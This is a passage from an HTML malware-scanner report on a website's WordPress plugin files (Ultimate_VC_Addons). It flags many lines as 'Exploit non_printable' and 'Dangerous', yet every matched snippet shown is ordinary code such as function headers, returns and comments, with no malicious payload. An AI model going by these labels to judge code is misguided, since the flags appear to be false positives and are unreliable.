</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 246</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_video_embed</span><span style="color: #007700">( </span><span style="color: #0000BB">$setting</span><span style="color: #007700">, </span><span style="color: #0000BB">$uid </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 30</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that register styles </span><span style="color: #007700">and </span><span style="color: #0000BB">scripts </span><span style="color: #007700">for </span><span style="color: #0000BB">Ultimate Heading Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_videos_module_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 355</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 359</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes settings of Ultimate Heading Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 363</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_videos_module_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 364</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_video_id</span><span style="color: #007700">( </span><span style="color: #0000BB">$setting </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$id</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 71</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_url</span><span style="color: #007700">( </span><span style="color: #0000BB">$setting</span><span style="color: #007700">, </span><span style="color: #0000BB">$params </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 95</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$url</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 99</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns Video Thumbnail Image</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_424").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_functions.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 7.02 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 16</span><br><table id="file_425" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array( </span><span style="color: #DD0000">'name' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$bname</span><span style="color: #007700">, </span><span style="color: #DD0000">'version' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$version</span><span style="color: #007700">, ); } function </span><span style="color: #0000BB">ult_prepareAtts</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) { if ( isset( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$return </span><span style="color: #007700">= </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">( array( </span><span style="color: #DD0000">'``'</span><span style="color: #007700">, ), array( </span><span style="color: #DD0000">'"'</span><span style="color: #007700">, ), </span><span style="color: #0000BB">$atts </span><span style="color: #007700">); } return </span><span style="color: #0000BB">$return</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that display the icon in different positions</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 14</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_get_icon_position_json</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 201</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_getBrowser</span><span style="color: #007700">() { </span><span style="color: #FF8000">// PHPCS:ignore:WordPress.NamingConventions.ValidFunctionName.FunctionNameInvalid</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 276</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_prepareAtts</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) { </span><span style="color: #FF8000">// PHPCS:ignore:WordPress.NamingConventions.ValidFunctionName.FunctionNameInvalid</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 278</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return = </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 288</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$return</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$json</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 37</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that display the banner in different styles</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">file</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_get_banner2_json</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 64</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate_get_animation_json' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 66</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that display the animation json in different styles</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 70</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_get_animation_json</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate_get_icon_position_json' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_425").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_info_list.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 46.88 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 18</span><br><table id="file_426" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">content</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) { global </span><span style="color: #0000BB">$uavc_info_list</span><span style="color: #007700">; return </span><span style="color: #0000BB">$uavc_info_list</span><span style="color: #007700">-></span><span style="color: #0000BB">front_info_list_item</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">); } } } } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate_VC_Addons_Info_List' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$uavc_info_list </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_VC_Addons_Info_List</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1030</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">content</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1032</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$uavc_info_list</span><span style="color: #007700">-></span><span style="color: #0000BB">front_info_list</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1050</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$uavc_info_list</span><span style="color: #007700">-></span><span style="color: #0000BB">front_info_list_item</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate Info </span><span style="color: #007700">List </span><span style="color: #0000BB">Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 198</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 207</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">info_list_item</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 386</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Functions </span><span style="color: #007700">for </span><span style="color: #0000BB">frontend editor</span><span style="color: #007700">..</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 392</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">front_info_list</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 490</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">front_info_list_item</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 552</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Ultimate Heading Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 556</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_info_list</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 557</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate Info </span><span style="color: #007700">List </span><span style="color: #0000BB">module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 59</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 67</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_is_inline' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 78</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Ultimate Info </span><span style="color: #007700">List </span><span style="color: #0000BB">Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 84</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">info_list</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_426").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_ihover.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 45.38 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 16</span><br><table id="file_427" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_ihover_scripts</span><span style="color: #007700">() { </span><span style="color: #0000BB">Ultimate_VC_Addons</span><span style="color: #007700">::</span><span style="color: #0000BB">ultimate_register_style</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate-vc-addons_ihover_css'</span><span style="color: #007700">, </span><span style="color: #DD0000">'ihover' </span><span style="color: #007700">); </span><span style="color: #0000BB">Ultimate_VC_Addons</span><span style="color: #007700">::</span><span style="color: #0000BB">ultimate_register_script</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate-vc-addons_ihover_js'</span><span style="color: #007700">, </span><span style="color: #DD0000">'ihover'</span><span style="color: #007700">, </span><span style="color: #0000BB">false</span><span style="color: #007700">, array( </span><span style="color: #DD0000">'jquery' </span><span style="color: #007700">), </span><span style="color: #0000BB">ULTIMATE_VERSION</span><span style="color: #007700">, </span><span style="color: #0000BB">true </span><span style="color: #007700">); } } </span><span style="color: #0000BB">n</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 106</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 109</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Ultimate iHover item Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1102</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_ihover_scripts</span><span style="color: #007700">() {</span>
</span>
